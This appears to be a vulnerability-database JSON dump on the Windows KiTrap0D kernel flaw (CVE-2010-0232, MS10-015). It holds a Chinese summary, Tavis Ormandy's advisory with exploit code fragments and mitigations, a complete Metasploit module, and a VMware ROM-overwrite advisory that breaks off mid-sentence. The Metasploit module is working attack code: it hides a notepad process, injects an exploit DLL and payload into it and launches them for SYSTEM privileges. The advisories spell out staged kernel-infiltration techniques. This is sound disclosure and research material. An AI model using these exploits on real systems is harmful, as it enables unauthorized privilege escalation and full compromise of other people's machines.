Windows\u662f\u5fae\u8f6f\u53d1\u5e03\u7684\u975e\u5e38\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\n\u5f53\u91ca\u653e\u5185\u5b58\u65f6\uff0cWindows\u5185\u6838\u6ca1\u6709\u6b63\u786e\u5730\u91cd\u7f6e\u6307\u9488\uff0c\u5bfc\u81f4\u5185\u6838\u4e2d\u51fa\u73b0\u53cc\u91cd\u91ca\u653e\u7684\u60c5\u51b5\u3002\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u8fd0\u884c\u4efb\u610f\u5185\u6838\u6001\u4ee3\u7801\u3002\u653b\u51fb\u8005\u53ef\u968f\u540e\u5b89\u88c5\u7a0b\u5e8f\uff1b\u67e5\u770b\u3001\u66f4\u6539\u6216\u5220\u9664\u6570\u636e\uff1b\u6216\u8005\u521b\u5efa\u62e5\u6709\u5b8c\u5168\u7528\u6237\u6743\u9650\u7684\u65b0\u5e10\u6237\u3002\r\n\r\nMicrosoft Windows XP SP3\r\nMicrosoft Windows XP SP2\r\nMicrosoft Windows Vista SP2\r\nMicrosoft Windows Vista SP1\r\nMicrosoft Windows Vista\r\nMicrosoft Windows Server 2008 SP2\r\nMicrosoft Windows Server 2008 R2\r\nMicrosoft Windows Server 2008\r\nMicrosoft Windows Server 2003 SP2\r\nMicrosoft Windows Server 2003\r\nMicrosoft Windows 2000SP4\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-015\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-015\uff1aVulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-015.mspx?pf=true", "cvss3": {}, "published": "2010-02-25T00:00:00", "type": "seebug", "title": "Microsoft Windows\u5185\u6838\u53cc\u91cd\u91ca\u653e\u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e\uff08MS10-015\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-0232", "CVE-2010-0233"], "modified": "2010-02-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19185", "id": "SSV:19185", "sourceData": "\n Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip)\r\nEDB Note: Make sure to run \"vdmallowed.exe\" (pre-compiled) inside the subfolder.\r\n \r\n \r\n \r\nMicrosoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack\r\n-------------------------------------------------------------------------\r\n \r\nCVE-2010-0232\r\n \r\nIn order to support BIOS service routines in legacy 16bit applications, the\r\nWindows NT Kernel supports the concept of BIOS calls in the Virtual-8086 mode\r\nmonitor code. These are implemented in two stages, the kernel transitions to\r\nthe second stage when the #GP trap handler (nt!KiTrap0D) detects that the\r\nfaulting cs:eip matches specific magic values.\r\n \r\nTransitioning to the second stage involves restoring execution context and\r\ncall stack (which had been previously saved) from the faulting trap frame once\r\nauthenticity has been verified.\r\n \r\nThis verification relies on the following incorrect assumptions:\r\n \r\n - Setting up a VDM context requires SeTcbPrivilege.\r\n - ring3 code cannot install arbitrary code segment selectors.\r\n - ring3 code cannot forge a trap frame.\r\n \r\nThis is believed to affect every release of the Windows NT kernel, from\r\nWindows NT 3.1 (1993) up to and including Windows 7 (2009).\r\n \r\nWorking out the details of the attack is left as an exercise for the reader.\r\n \r\nJust kidding, that was an homage to Derek Soeder :-)\r\n \r\n- Assumption 0: Setting up a VDM context requires SeTcbPrivilege.\r\n \r\nCreating a VDM context requires EPROCESS->Flags.VdmAllowed to be set in order\r\nto access the authenticated system service, NtVdmControl(). VdmAllowed can\r\nonly be set using NtSetInformationProcess(), which verifies the caller has\r\nSeTcbPrivilege. If this is true, the caller is very privileged and can\r\ncertainly be trusted.\r\n \r\nThis restriction can be subverted by requesting the NTVDM subsystem, and then\r\nusing CreateRemoteThread() to execute in the context of the subsystem process,\r\nwhich will already have this flag set.\r\n \r\n- Assumption 1: ring3 code cannot install arbitrary code segment selectors.\r\n \r\nCpl is usually equal to the two least significant bits of cs and ss, and is\r\na simple way to calculate the privilege of a task. However, there is an\r\nexception, Virtual-8086 mode.\r\n \r\nReal mode uses a segmented addressing scheme in order to allow 16-bit\r\naddresses to access the 20-bit address space. This is achieved by forming\r\nphysical addresses from a calculation like (cs << 4) + (eip & 0xffff). The\r\nsame calculation is used to map the segmented real address space onto the\r\nprotected linear address space in Virtual-8086 mode. Therefore, I must be\r\npermitted to set cs to any value, and checks for disallowed or privileged\r\nselectors can be bypassed (PsSetLdtEnties will reject any selector where any\r\nof the three lower bits are unset, as is the case with the required cs pair).\r\n \r\n- Assumption 2: ring3 code cannot forge a trap frame.\r\n \r\nReturning to usermode with iret is a complicated operation, the pseudocode for\r\nthe iret instruction alone spans several pages of Intel's Software Developers\r\nManual. The operation occurs in two stages, a pre-commit stage and a\r\npost-commit stage. Using the VdmContext installed using NtVdmControl(), an\r\ninvalid context can be created that causes iret to fail pre-commit, thus\r\nforging a trap frame.\r\n \r\nThe final requirement involves predicting the address of the second-stage BIOS\r\ncall handler. The address is static in Windows 2003, XP and earlier operating\r\nsystems, however, Microsoft introduced kernel base randomisation in Windows\r\nVista. Unfortunately, this potentially useful exploit mitigation is trivial\r\nto defeat locally as unprivileged users can simply query the loaded module list\r\nvia NtQuerySystemInformation().\r\n \r\n--------------------\r\nAffected Software\r\n------------------------\r\n \r\nAll 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to\r\nbe affected, including but not limited to the following actively supported\r\nversions:\r\n \r\n - Windows 2000\r\n - Windows XP\r\n - Windows Server 2003\r\n - Windows Vista\r\n - Windows Server 2008\r\n - Windows 7\r\n \r\n--------------------\r\nConsequences\r\n-----------------------\r\n \r\nUpon successful exploitation, the kernel stack is switched to an attacker\r\nspecified address.\r\n \r\nAn attacker would trigger the vulnerability by setting up a specially\r\nformed VDM_TIB in their TEB, using a code sequence like this:\r\n \r\n/* ... */\r\n // Magic CS required for exploitation\r\n Tib.VdmContext.SegCs = 0x0B;\r\n // Pointer to fake kernel stack\r\n Tib.VdmContext.Esi = &KernelStack;\r\n // Magic IP required for exploitation\r\n Tib.VdmContext.Eip = Ki386BiosCallReturnAddress;\r\n \r\n NtCurrentTeb()->Reserved4[0] = &Tib;\r\n/* ... */\r\n \r\nFollowed by\r\n \r\n/* ... */\r\n NtVdmControl(VdmStartExecution, NULL);\r\n/* ... */\r\n \r\nWhich will reach the following code sequence via the #GP trap handler,\r\nnt!KiTrap0D. Please note how the stack pointer is restored from the saved\r\n(untrusted) trap frame at 43C3E6, undoubtedly resulting in the condition\r\ndescribed above.\r\n \r\n/* ... */\r\n.text:0043C3CE Ki386BiosCallReturnAddress proc near\r\n.text:0043C3CE mov eax, large fs:KPCR.SelfPcr\r\n.text:0043C3D4 mov edi, [ebp+KTRAP_FRAME.Esi]\r\n.text:0043C3D7 mov edi, [edi]\r\n.text:0043C3D9 mov esi, [eax+KPCR.NtTib.StackBase]\r\n.text:0043C3DC mov ecx, 84h\r\n.text:0043C3E1 mov [eax+KPCR.NtTib.StackBase], edi\r\n.text:0043C3E4 rep movsd\r\n.text:0043C3E6 mov esp, [ebp+KTRAP_FRAME.Esi]\r\n.text:0043C3E9 add esp, 4\r\n.text:0043C3EC mov ecx, [eax+KPCR.PrcbData.CurrentThread]\r\n.text:0043C3F2 mov [ecx+KTHREAD.InitialStack], edi\r\n.text:0043C3F5 mov eax, [eax+KPCR.TSS]\r\n.text:0043C3F8 sub edi, 220h\r\n.text:0043C3FE mov [eax+KTSS.Esp0], edi\r\n.text:0043C401 pop edx\r\n.text:0043C402 mov [ecx+KTHREAD.Teb], edx\r\n.text:0043C405 pop edx\r\n.text:0043C406 mov large fs:KPCR.NtTib.Self, edx\r\n.text:0043C40D mov ebx, large fs:KPCR.GDT\r\n.text:0043C414 mov [ebx+3Ah], dx\r\n.text:0043C418 shr edx, 10h\r\n.text:0043C41B mov byte ptr [ebx+3Ch], dl\r\n.text:0043C41E mov [ebx+3Fh], dh\r\n.text:0043C421 sti\r\n.text:0043C422 pop edi\r\n.text:0043C423 pop esi\r\n.text:0043C424 pop ebx\r\n.text:0043C425 pop ebp\r\n.text:0043C426 retn 4\r\n/* ... */\r\n \r\nPossibly naive example code for triggering this condition is available from the\r\nlink below.\r\n \r\nhttp://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip\r\nExploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip)\r\n \r\nThe code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista\r\nand Windows 7. Support for other affected operating systems is left as an\r\nexercise for the interested reader.\r\n \r\n-------------------\r\nMitigation\r\n-----------------------\r\n \r\nIf you believe you may be affected, you should consider applying the workaround\r\ndescribed below.\r\n \r\nTemporarily disabling the MSDOS and WOWEXEC subsystems will prevent the attack\r\nfrom functioning, as without a process with VdmAllowed, it is not possible to\r\naccess NtVdmControl() (without SeTcbPrivilege, of course).\r\n \r\nThe policy template \"Windows Components\\Application Compatibility\\Prevent\r\naccess to 16-bit applications\" may be used within the group policy editor to\r\nprevent unprivileged users from executing 16-bit applications. I'm informed\r\nthis is an officially supported machine configuration.\r\n \r\nAdministrators unfamiliar with group policy may find the videos below\r\ninstructive. Further information is available from the Windows Server\r\nGroup Policy Home\r\n \r\nhttp://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.\r\n \r\nTo watch a demonstration of this policy being applied to a Windows Server 2003\r\ndomain controller, see the link below.\r\n \r\nhttp://www.youtube.com/watch?v=XRVI4iQ2Nug\r\n \r\nTo watch a demonstration of this policy being applied to a Windows Server 2008\r\ndomain controller, see the link below.\r\n \r\nhttp://www.youtube.com/watch?v=u8pfXW7crEQ\r\n \r\nTo watch a demonstration of this policy being applied to a shared but\r\nunjoined Windows XP Professional machine, see the link below.\r\n \r\nhttp://www.youtube.com/watch?v=u7Y6d-BVwxk\r\n \r\nOn Windows NT4, the following knowledgebase article explains how to disable the\r\nNTVDM and WOWEXEC subsystems.\r\n \r\nhttp://support.microsoft.com/kb/220159\r\n \r\nApplying these configuration changes will temporarily prevent users from\r\naccessing legacy 16-bit MS-DOS and Windows 3.1 applications, however, few users\r\nrequire this functionality.\r\n \r\nIf you do not require this feature and depend on NT security, consider\r\npermanently disabling it in order to reduce kernel attack surface.\r\n \r\n-------------------\r\nSolution\r\n-----------------------\r\n \r\nMicrosoft was informed about this vulnerability on 12-Jun-2009, and they\r\nconfirmed receipt of my report on 22-Jun-2009.\r\n \r\nRegrettably, no official patch is currently available. As an effective and easy\r\nto deploy workaround is available, I have concluded that it is in the best\r\ninterest of users to go ahead with the publication of this document without an\r\nofficial patch. It should be noted that very few users rely on NT security, the\r\nprimary audience of this advisory is expected to be domain administrators and\r\nsecurity professionals.\r\n \r\n-------------------\r\nCredit\r\n-----------------------\r\n \r\nThis bug was discovered by Tavis Ormandy.\r\n \r\n-------------------\r\nGreetz\r\n-----------------------\r\n \r\nGreetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK,\r\nScaryBeasts, spender and all my other elite colleagues.\r\n \r\nCheck out some photography while at ring0 http://flickr.com/meder.\r\n \r\n-------------------\r\nReferences\r\n-----------------------\r\n \r\nDerek Soeder has previously reported some legendary NT bugs, including multiple\r\nvdm bugs that, while unrelated to this issue, make fascinating reading.\r\n \r\n- http://seclists.org/fulldisclosure/2004/Oct/404, Windows VDM #UD LocalPrivilege Escalation\r\n- http://seclists.org/fulldisclosure/2004/Apr/477, Windows VDM TIB Local Privilege Escalation\r\n- http://seclists.org/fulldisclosure/2007/Apr/357, Zero Page Race Condition Privilege Escalation\r\n \r\n-------------------\r\nAppendix\r\n-----------------------\r\n \r\nSHA-1 checksum of KiTrap0D.zip follows.\r\n \r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\n99a047427e9085d52aaddfc9214fd1a621534072 KiTrap0D.zip\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.5 (GNU/Linux)\r\n \r\niQEVAwUBS1W6+RvyfE4zaHEXAQK//QgAvo/VhPdeASGe7SSfC3jLwNzsfVfM+FMo\r\nx7JZMMfVUh6b/+FxvokIpsCUf7QQkv+YcyCiatutVjUok5aw5BirFtPLHORIIKPX\r\nB5gN2a4G8RIXh5yKE6FffKGQsPJNW1Ua5Jss8rf59TEj3EDky1vco+WVmmz7TsHn\r\nTQdUreVcL8wFmCAgq5X0AKrdepYDBmYLF0AUFOdG3mKJ43dnP59p9R7+ckv0pfLW\r\nXtvOgzZDNMew4z2Z53YQpE7dO+Y3H3rnhLN7jF7i9We9iiG4ATDke8byFAIDZQZx\r\nucq5EOcRsfAAWW3O8EbzQa0NiHHScJrKDjvg0gX1Y69MBBwCLNP6yg==\r\n=LHU0\r\n-----END PGP SIGNATURE-----\r\n \r\n-- \r\n-------------------------------------\r\ntavisosdf.lonestar.org | finger me for my gpg key.\r\n-------------------------------------------------------\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19185", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:04", "description": "", "cvss3": {}, "published": "2013-11-14T00:00:00", "type": "packetstorm", "title": "Windows SYSTEM Escalation Via KiTrap0D", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-0232"], "modified": "2013-11-14T00:00:00", "id": "PACKETSTORM:124025", "href": "https://packetstormsecurity.com/files/124025/Windows-SYSTEM-Escalation-Via-KiTrap0D.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'msf/core/exploit/exe' \nrequire 'rex' \n \nclass Metasploit3 < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Post::File \ninclude Post::Windows::Priv \n \ndef initialize(info={}) \nsuper( update_info( info, \n'Name' => 'Windows SYSTEM escalation via KiTrap0D', \n'Description' => %q{ \nThis module will create a new session with SYSTEM privileges via the \nKiTrap0D exlpoit by Tavis Ormandy. If the session is use is already \nelevated then the exploit will not run. The module relies on kitrap0d.x86.dll, \nand is not supported on x64 editions of Windows. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Tavis Ormandy', # Original resesarcher and exploit creator \n'HD Moore', # Port of Tavis' code to meterpreter module \n'Pusscat', # Port of Tavis' code to meterpreter module \n'OJ Reeves' # Port of meterpreter code to a windows local exploit \n], \n'Platform' => [ 'win' ], \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => [ \n[ 'Windows 2K SP4 - Windows 7 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ] \n], \n'DefaultTarget' => 0, \n'References' => [ \n[ 'CVE', '2010-0232' ], \n[ 'OSVDB', '61854' ], \n[ 'MSB', 'MS10-015' ], \n[ 'EDB', '11199' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2010/Jan/341' ] \n], \n'DisclosureDate'=> \"Jan 19 2010\" \n)) \n \nend \n \ndef check \n# Validate platform architecture \nif sysinfo[\"Architecture\"] =~ /x64|WOW64/i \nreturn Exploit::CheckCode::Safe \nend \n \n# Validate OS version \nwinver = sysinfo[\"OS\"] \nunless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/ \nreturn Exploit::CheckCode::Safe \nend \n \nreturn Exploit::CheckCode::Appears \nend \n \ndef exploit \nif is_system? \nfail_with(Exploit::Failure::None, 'Session is already elevated') \nend \n \nif check == Exploit::CheckCode::Safe \nfail_with(Exploit::Failure::NotVulnerable, \"Exploit not available on this system.\") \nend \n \ndll = '' \noffset = nil \n \nprint_status(\"Launching notepad to host the exploit...\") \ncmd = \"notepad.exe\" \nopts = {'Hidden' => true} \nprocess = client.sys.process.execute(cmd, nil, opts) \npid = process.pid \nhost_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{pid} launched.\") \n \nprint_status(\"Reflectively injecting the exploit DLL into #{pid}...\") \nlibrary_path = ::File.join(Msf::Config.data_directory, \"exploits\", \n\"CVE-2010-0232\", \"kitrap0d.x86.dll\") \nlibrary_path = ::File.expand_path(library_path) \n::File.open(library_path, 'rb') { |f| dll = f.read } \npe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll)) \npe.exports.entries.each do |e| \nif e.name =~ /^\\S*ReflectiveLoader\\S*/ \noffset = pe.rva_to_file_offset(e.rva) \nbreak \nend \nend \n# Inject the exloit, but don't run it yet. \nexploit_mem = inject_into_pid(dll, host_process) \n \nprint_status(\"Exploit injected. Injecting payload into #{pid}...\") \n# Inject the payload into the process so that it's runnable by the exploit. \npayload_mem = inject_into_pid(payload.encoded, host_process) \n \nprint_status(\"Payload injected. Executing exploit...\") \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nhost_process.thread.create(exploit_mem + offset, payload_mem) \n \nprint_good(\"Exploit finished, wait for (hopefully privileged) payload execution to complete.\") \nend \n \nprotected \n \ndef inject_into_pid(payload, process) \npayload_size = payload.length \npayload_size += 1024 - (payload.length % 1024) unless payload.length % 1024 == 0 \npayload_mem = process.memory.allocate(payload_size) \nprocess.memory.protect(payload_mem) \nprocess.memory.write(payload_mem, payload) \nreturn payload_mem \nend \n \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/124025/ms10_015_kitrap0d.rb.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:16:35", "description": "", "cvss3": {}, "published": "2012-03-30T00:00:00", "type": "packetstorm", "title": "VMware High-Bandwidth Backdoor ROM Overwrite Privilege Elevation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-0232", "CVE-2007-1206", "CVE-2012-1515"], "modified": "2012-03-30T00:00:00", "id": "PACKETSTORM:111404", "href": "https://packetstormsecurity.com/files/111404/VMware-High-Bandwidth-Backdoor-ROM-Overwrite-Privilege-Elevation.html", "sourceData": "`VMware High-Bandwidth Backdoor ROM Overwrite Privilege Elevation \n \nDerek Soeder \nds.adv.pub@gmail.com \n \nReported: December 5, 2011 \nPublished: March 30, 2012 \n \n \nAFFECTED VENDOR \n--------------- \nVMware, Inc. \n \n \nAFFECTED ENVIRONMENTS \n--------------------- \nThe following VMware product versions are known to be affected: \nVMware Server 1.0.10 and earlier \nVMware Server 2.0.2 and earlier \nVMware Workstation 7.0.0 \nVMware Workstation 7.1.1 and earlier \nVMware ESXi 3.5.0 Update 5 \nVMware ESXi 4.0.0 Update 4 Build 504850 and earlier \nVMware ESXi 4.1.0 Build 320137 (ESXi410-201011401-BG) and earlier \nOther related versions not tested but assumed to be affected \n \nThe following guest operating systems are known to enable exploitation: \nWindows NT 4.0 \nWindows 2000 \nWindows XP (32-bit) \nWindows Server 2003 (32-bit) \n \n \nUNAFFECTED ENVIRONMENTS \n----------------------- \nThe following VMware product versions are not affected: \nVMware Workstation 7.1.2 and later \nVMware ESXi 4.0.0 Update 4 with patch ESXi400-201203401-SG \nVMware ESXi 4.1.0 Update 1 Build 348481 (ESXi410-201101201-SG) and later \nVMware ESXi 5.0.0 \n \nThe following guest operating systems do not appear to permit exploitation: \nWindows XP (64-bit) \nWindows Server 2003 (64-bit) \nWindows Vista (32-bit and 64-bit) \nWindows Server 2008 (32-bit and 64-bit) \nWindows 7 (32-bit and 64-bit) \nWindows Server 2008 R2 \n \n \nIDENTIFIERS \n----------- \nCVE-2012-1515 \n \n \nIMPACT \n------ \nThe vulnerability described in this document can be exploited by \nunprivileged code running on certain guest operating systems in a \nVMware virtual machine in order to execute arbitrary code with kernel \nprivileges. \n \n \nVULNERABILITY DETAILS \n--------------------- \nThe VMware backdoor interface consists of a number of operations \nissued via I/O instructions executed in the guest with a command \nnumber in CX and data or \"magic\" values in a number of other \nregisters. Command 0x1E / 30 (BDOOR_CMD_MESSAGE) and its subcommands \n(MESSAGE_TYPE_*) allow messages to be exchanged between the guest and \nhost. Since the regular backdoor would only allow for the exchange of \nno more than one machine word of data per I/O instruction, a \n\"high-bandwidth\" backdoor exists on port 0x5659 (BDOORHB_PORT) to \npermit bulk transmission of data from and to the guest via the REP \nOUTSB and REP INSB instructions respectively. If the direction flag \nis clear, the host performs the transfer by memcpy'ing directly from \nor to its mapping of guest memory, after performing any applicable \naddress translations and memory access checks. \n \nOne special case that the host fails to consider, however, is when a \nREP INSB is targeting memory that would normally be emulated as \nread-only. If the guest operating system allows an unprivileged user \nto address a writable view of read-only memory, the user can exploit \nthis vulnerability to modify the ROM's contents whereas he otherwise \ncould not. To then parlay this ability into a successful attack \nrequires causing privileged code that trusts the ROM to act on the \naltered contents in an exploitable way. \n \n \nEXPLOITATION \n------------ \nOnly 32-bit editions of Windows prior to Vista allow an unprivileged \nuser to map a PAGE_READWRITE view of the BIOS ROM by launching a \nVirtual DOS Machine (NTVDM.EXE). On 32-bit Windows Vista and Windows \nServer 2008, NT!VdmpInitialize is hard-coded to map physical addresses \n0xC0000 through 0xFFFFF at the corresponding virtual addresses as \nPAGE_READONLY, while 32-bit Windows 7 allocates writable virtual \nmemory at 0xC0000 and copies in the contents of the BIOS ROM, and VDM \nsupport does not exist at all in 64-bit editions of Windows. \n(Presumably, ROM was originally mapped as writable so that 16-bit code \nthat tried for any reason to write to ROM could do so and have it \nsilently fail while still causing the expected side effects like \nupdating the flags. One wonders what prompted the change on Vista.) \n \nAlthough this vulnerability allows modification of the in-guest BIOS \nROM, there seem to be few opportunities to get Windows to execute \nmodified BIOS code. One possible attack involves putting the modified \ncode in place and initiating or waiting for a soft reboot, after which \nthe planted code would execute and could mount a BootRoot-style attack \nto alter the guest kernel as it loads. Another possibility is to \nmodify BIOS code and wait for some other user to run a 16-bit program \nthat changes the video mode or makes an exotic BIOS call unhandled by \nNTVDM, but this is obviously flimsy. The third and best possibility, \ndiscussed below, is to cause the kernel to change the video mode, \nwhich will execute an INT 10h instruction from one of two Virtual-8086 \nmode environments, either of which can be escaped to infiltrate the \nkernel. \n \nAs the author mentioned in the advisory for CVE-2007-1206 (which \nallowed modification of the Interrupt Vector Table rather than the \nBIOS code it references), HAL.DLL will issue an INT 10h to prepare for \nhibernation or a blue-screen, both of which could be considered \"local \ndenial-of-service\" conditions. However, the author has since found \nthat requesting full-screen text mode or switching to a VGA display \nmode will also cause the INT 10h handler to be executed, although by \nNTOSKRNL.EXE rather than HAL. Rough reverse call trees for both are \ndepicted below: \n \nHAL!HalpBiosCall \n^ HAL!HalpBiosDisplayReset (via NT!HalPrivateDispatchTable) \n. ^ BOOTVID!VidResetDisplay \n. . ^ NT!VidResetDisplay \n. . . ^ NT!InbvResetDisplay \n. . . . ^ NT!KeBugCheck2 \n. . . . . ^ (blue-screen) \n. . . . ^ HAL!InbvResetDisplay \n. . . . . ^ HAL!HalHandleNMI \n. . . . . . ^ NT!KiTrap02 \n. . . . . . . ^ (catastrophe) \n. . . . ^ NT!PopSaveHiberContext (via DPC) \n. . . . . ^ NT!PopInvokeSystemStateHandler \n. . . . . . ^ NT!PopShutdownSystem \n. . . . . . . ^ NT!PopGracefulShutdown \n. . . . . . . . ^ NT!NtSetSystemPowerState \n. . . . . . . . . ^ NT!NtShutdownSystem \n. . . . . . ^ NT!PopSleepSystem \n. . . . . . . ^ NT!NtSetSystemPowerState \n. . . . . . . . ^ NT!NtShutdownSystem \n \nNT!Ke386CallBios \n^ VIDEOPRT!Ke386CallBios \n. ^ VIDEOPRT!VideoPortInt10 \n. . ^ VGA!VgaSetMode \n. . . ^ VGA!VgaStartIO \n. . . . ^ VIDEOPRT!pVideoPortDispatch \n. . . . . ^ NT!IofCallDriver \n. . . . . . ^ WIN32K!GreDeviceIoControl \n. . . . . . . ^ WIN32K!EngDeviceIoControl \n. . . . . . . . ^ (...) \n. . . . . . . . . ^ WIN32K!DrvChangeDisplaySettings \n. . . . . . . . . . ^ WIN32K!xxxUserChangeDisplaySettings \n. . . . . . . . . . . ^ WIN32K!NtUserChangeDisplaySettings \n. . . . . . . . . . . . ^ USER32!NtUserChangeDisplaySettings \n. . . . . . . . . . . . . ^ USER32!ChangeDisplaySettings* \n. . . . . . . . ^ (...) \n. . . . . . . . . ^ WIN32K!xxxbFullscreenSwitch \n. . . . . . . . . . ^ WIN32K!xxxConsoleControl \n. . . . . . . . . . . ^ WIN32K!NtUserConsoleControl \n. . . . . . . . . . . . ^ WINSRV!NtUserConsoleControl \n. . . . . . . . . . . . . ^ WINSRV!ChangeDispSettings \n. . . . . . . . . . . . . . ^ WINSRV!HandleSysKeyEvent \n. . . . . . . . . . . . . . . ^ WINSRV!ConsoleWindowProc \n. . . . . . . . . . . . . . . . ^ (...) \n. . . . . . . . . . . . . . . . . ^ NTDLL!CsrClientCallServer \n. . . . . . . . . . . . . . . . . . ^ KERNEL32!SetConsoleDisplayMode \n. . ^ VIDEOPRT!VpInt10CallBios \n. . . ^ VGA!GetVideoMemoryBaseAddress \n. . . . ^ VGA!VgaSetMode \n. . . . . ^ (...) \n \nAs suggested above, unprivileged code can cause execution of the BIOS \nINT 10h handler from either HAL or NTOSKRNL, the former through a \nblue-screen or shutdown (such as hibernation), and the latter by \nchanging the video mode, which requires console access. Assuming that \nmalicious code has access to the console, and assuming that the video \ndriver does not prevent it (as the VMware Tools video driver in some \ncases does), the malicious code could call ChangeDisplaySettings[Ex] \nor SetConsoleDisplayMode to force a video mode change without needing \nSeShutdownPrivilege or an independent blue-screen flaw. The following \nparagraphs cover exploitation in both the HAL and NTOSKRNL cases, \nstarting from the assumption that an attacker has already modified the \nBIOS's INT 10h handler code. \n \nTo infiltrate the kernel when invoked via HAL!HalpBiosCall, the \nmalicious INT 10h handler code can simply modify the pages of memory \ncontaining HAL!HalpRealModeStart, the V86-mode stack, and \nHAL!HalpRealModeEnd, which HAL!HalpBiosDisplayReset maps with write \npermissions at virtual address 0x20000. Once execution returns to \nHAL!HalpRealModeEnd following attempted execution of the C4h/C4h \nsequence, the attacker will be executing code in the familiar Windows \nkernel environment, albeit with some cleanup necessary. Malicious \ncode might detect the HAL case by observing if SS = 0x2000. \n \nInfiltrating the kernel from the NT!Ke386CallBios environment, on the \nother hand, is a little more indirect. NTOSKRNL issues an INT 10h \nfrom a proper VDM with no interesting kernel code targets, but the VDM \nTIB is accessible to V86-mode code (at address 0x12000). The \nmalicious INT 10h handler can modify the kernel stack pointer stored \nin 'CONTEXT.Esi', just as described in Tavis Ormandy's CVE-2010-0232 \nadvisory (\"Microsoft Windows NT #GP Trap Handler Allows Users to \nSwitch Kernel Stack\"), in order to hijack execution after the cleanup \ncode at NT!Ki386BiosCallReturnAddress completes. Malicious code might \ndetect the NTOSKRNL case by checking for SS = 0x1000. \n \nOf course, none of this matters without the ability to meaningfully \nmodify BIOS code. Malicious code in the guest can only modify ROM \nthrough the high-bandwidth backdoor REP INSB instruction, meaning it \ncan only overwrite ROM with bytes it can read from the host. Although \nVMware Server 1.0 permits the guest to read host stack memory beyond \nthe end of any host-to-guest message, which allows reading of (and \ntherefore overwriting with) arbitrary bytes by first \"seeding\" the \nbuffer with a long REP OUTSB, a more version-independent approach is \nto first use the \"info-set\" command to store an arbitrary low-byte \nstring in the VMDb \"guestinfo\" database, and then use \"info-get\" to \nread the string from the host and overwrite the desired portion of \nguest ROM. \n \nThe author's proof-of-concept exploit uses this technique to implement \na six-stage approach, comprising: (1) the replacement INT 10h handler, \na tiny, low-byte arithmetic / PUSH / Jcc sequence that computes the \noffset of the next stage, pushes it, and branches to a nearby RET, \nRETF, or IRET; (2) a larger, low-byte sequence stored over the 8x8 \ngraphics font table (hopefully in video BIOS ROM pointed to by the INT \n1Fh vector) that computes the bytes of the next stage, pushes them \nonto the stack, and branches to a nearby RETF or IRET; (3) a small, \nbase-64-like decoder that decodes and executes the next stage, which \nwas also stored in the font table; (4) a loader that reads the \nsubsequent stages into RAM from the \"guestinfo\" database via the \nVMware backdoor interface, decodes them, and executes the next stage; \n(5) the main V86-mode payload, which prepares the next stage to \nexecute in ring 0 using the appropriate, aforementioned HAL or \nNTOSKRNL infiltration technique; and (6) the main kernel payload, \nwhich creates an interrupt gate for convenient kernel access and \ncleans up the environment so that execution can resume without \ncrashing. The Win32 portion of the exploit can then use the interrupt \ngate as needed. \n \nWith ring-0 privileges, the payload can restore the original contents \nof BIOS ROM (assuming it preserved them) by making ROM writable via \nPCI configuration space. In the eight bytes of PCI configuration \nspace starting at address 0x80000058, bit 0 and bit 4 each indicate \nwhether or not a segment of BIOS ROM is mapped, and bits 1 and 5 \ndetermine whether or not those segments are writable. Setting the \nwritable bits for all mapped segments, then, allows the ROM to be \ndirectly overwritten with arbitrary bytes, as opposed to being \noverwritten indirectly and only with low bytes through re-exploitation \nof the vulnerability. \n \nAnother ramification of exploitation requiring rectification is the \nunavoidable change in video mode. Before it invokes the INT 10h \nhandler, the kernel has already changed the display mode and \nconsequently blacked out the screen, so programming the malicious \nhandler to return without executing the original handler doesn't help \nand could actually make it more difficult to properly restore the \ndisplay. One easy means of recovering from the mode change is to \ninject code into session 0's WINLOGON.EXE process that enumerates 